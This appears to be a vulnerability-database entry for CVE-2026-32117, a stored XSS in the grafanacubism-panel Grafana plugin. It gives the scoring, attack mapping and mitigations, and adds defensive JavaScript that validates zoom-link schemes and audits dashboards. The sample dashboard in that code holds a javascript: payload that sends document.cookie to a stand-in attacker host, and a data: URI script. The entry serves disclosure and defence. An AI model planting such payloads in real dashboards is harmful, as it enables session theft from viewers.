CVE-2026-32117
Published: 11 March 2026
Summary
CVE-2026-32117 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Ekacnet Grafanacubism-Panel. Its CVSS base score is 7.6 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185). The CVE sits at the 3.8th percentile for exploit likelihood, well below the median, and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2026-32117 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the grafanacubism-panel plugin, which lets Grafana panels render cubism.js visualisations. In versions 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL straight to window.location.assign() or window.open() without validating its scheme. Published on 2026-03-11, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N): reachable over the network with low attack complexity, but requiring a low-privilege account to plant the link and a user interaction to trigger it. The scope is changed because the payload runs in the victim's browser under the Grafana origin rather than in the component the attacker configures, and the confidentiality impact is rated high.
Exploiting the issue requires dashboard Editor privileges: the attacker configures the affected panel's zoom link as a javascript: URI carrying the payload. The payload fires when any Viewer with access to the dashboard drag-zooms on that panel, and because it executes in the Grafana origin it runs with the Viewer's authenticated session and can read whatever that session can reach, such as dashboard contents or any session token exposed to page scripts. The link is stored in the dashboard model, so this is a stored XSS: the Editor plants it once and every later Viewer interaction triggers it.
Mitigation details are provided in the plugin's GitHub security advisory (GHSA-q6fh-6m3m-5948) and the fixing commit (b79cbf7e5eb3225bb204bcef274e15e6b19d9926), which adds scheme validation to the zoom-link handler. Practitioners should update grafanacubism-panel to a release after 0.1.2, audit existing dashboard JSON for zoom links whose scheme is anything other than http or https (a javascript: link planted before the upgrade stays in the dashboard model until someone removes it), and restrict the Editor role to trusted users so that fewer accounts can plant such links in the first place.
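The following is an added example, not code from the grafanacubism-panel project or its fixing commit. It shows the shape of a zoom-link handler that hands an editor-supplied string straight to navigation (the bug class described above), a hardened version that parses the link with the WHATWG URL constructor and allow-lists the scheme (the SI-10 input-validation control), and an audit pass over an exported dashboard model to find links planted before an upgrade. The panel option name `zoomLink`, the `navigate` callback (standing in for window.location.assign / window.open so the code runs under Node) and the sample dashboard are assumptions for illustration.

```javascript
// Added example; not the plugin's own code. `zoomLink`, `navigate` and the
// sample dashboard below are assumptions for illustration.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Vulnerable shape (CVE-2026-32117): the editor-supplied string is handed to
// navigation unchanged. In the browser `navigate` would be
// window.location.assign or window.open; here it is injected so the example
// runs in Node.
function vulnerableZoomLink(link, navigate) {
  navigate(link); // a "javascript:" link executes in the Grafana origin
}

// Hardened: parse with the WHATWG URL constructor, then allow-list the scheme.
// The parser strips leading/trailing whitespace and embedded tabs/newlines and
// lower-cases the scheme, so a string prefix check such as
// link.startsWith("javascript:") is both unnecessary and bypassable.
// Relative links resolve against the Grafana base URL and inherit its scheme.
function validateZoomLink(link, base = "https://grafana.example.invalid/") {
  if (typeof link !== "string") return null;
  let parsed;
  try {
    parsed = new URL(link, base);
  } catch {
    return null; // unparsable, e.g. "http://" with no host
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Returns true if navigation happened, false if the link was rejected.
function safeZoomLink(link, navigate) {
  const href = validateZoomLink(link);
  if (href === null) return false;
  navigate(href);
  return true;
}

// Audit: walk a dashboard model (including panels nested inside row panels)
// and report every panel whose zoom link fails validation. Run this over
// exported dashboard JSON to find links planted before the plugin was fixed.
function auditDashboard(dashboard) {
  const findings = [];
  const walk = (panels) => {
    for (const panel of panels || []) {
      const link = panel.options && panel.options.zoomLink; // assumed option name
      if (typeof link === "string" && validateZoomLink(link) === null) {
        findings.push({ id: panel.id, title: panel.title, link });
      }
      walk(panel.panels); // row panels carry their children in `panels`
    }
  };
  walk(dashboard.panels);
  return findings;
}

// Constructed sample dashboard, not a real export.
const SAMPLE_DASHBOARD = {
  title: "latency",
  panels: [
    { id: 1, title: "ok", type: "cubism",
      options: { zoomLink: "/d/abc123/detail?from=now-1h" } },
    { id: 2, title: "planted", type: "cubism",
      options: { zoomLink: " JavaScript:fetch('https://attacker.invalid/?c='+document.cookie)" } },
    { id: 3, title: "row", type: "row", panels: [
      { id: 4, title: "nested", type: "cubism",
        options: { zoomLink: "data:text/html,<script>alert(1)</script>" } },
    ] },
  ],
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(auditDashboard(SAMPLE_DASHBOARD)); // panels 2 and 4 are reported
}
```

The allow-list deliberately checks the parsed `protocol` rather than the raw string: mixed case, a leading tab or an embedded newline are all normalised away by the URL parser before the comparison, which is exactly the class of bypass a hand-written prefix check misses. Note that an http(s) allow-list is only the scheme check the advisory calls for; if zoom links are meant to stay inside the Grafana instance, also compare `parsed.origin` against the dashboard's own origin.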
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-11407
Vulnerability details
The grafanacubism-panel plugin allows use of cubism.js in Grafana. In 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() / window.open() with no scheme validation. An attacker with dashboard Editor privileges can set the link to a javascript: URI; when any Viewer drag-zooms on the panel, the payload executes in the Grafana origin.
- CWE(s): CWE-79 (Cross-site Scripting)
Related Threats
MITRE ATT&CK Enterprise Techniques (AI)
Why these techniques?
Stored XSS in Grafana web panel directly enables browser session hijacking (T1185) via javascript: URI execution and theft/use of web session cookies (T1539, T1550.004) for data exfiltration or impersonation.
Mitigating Controls (NIST 800-53 r5) (AI)
- SI-2 (Flaw Remediation): directly mitigates the CVE by requiring timely patching of the vulnerable grafanacubism-panel plugin to a release after 0.1.2, which adds scheme validation to the zoom-link handler.
- SI-10 (Information Input Validation): enforces validation of dashboard-editor-supplied URLs in the zoom-link handler so that javascript: URIs are rejected before they reach window.location.assign() or window.open().
- Least privilege: limits the dashboard Editor role to trusted users only, reducing the number of accounts able to configure a malicious zoom link that Viewers would then trigger.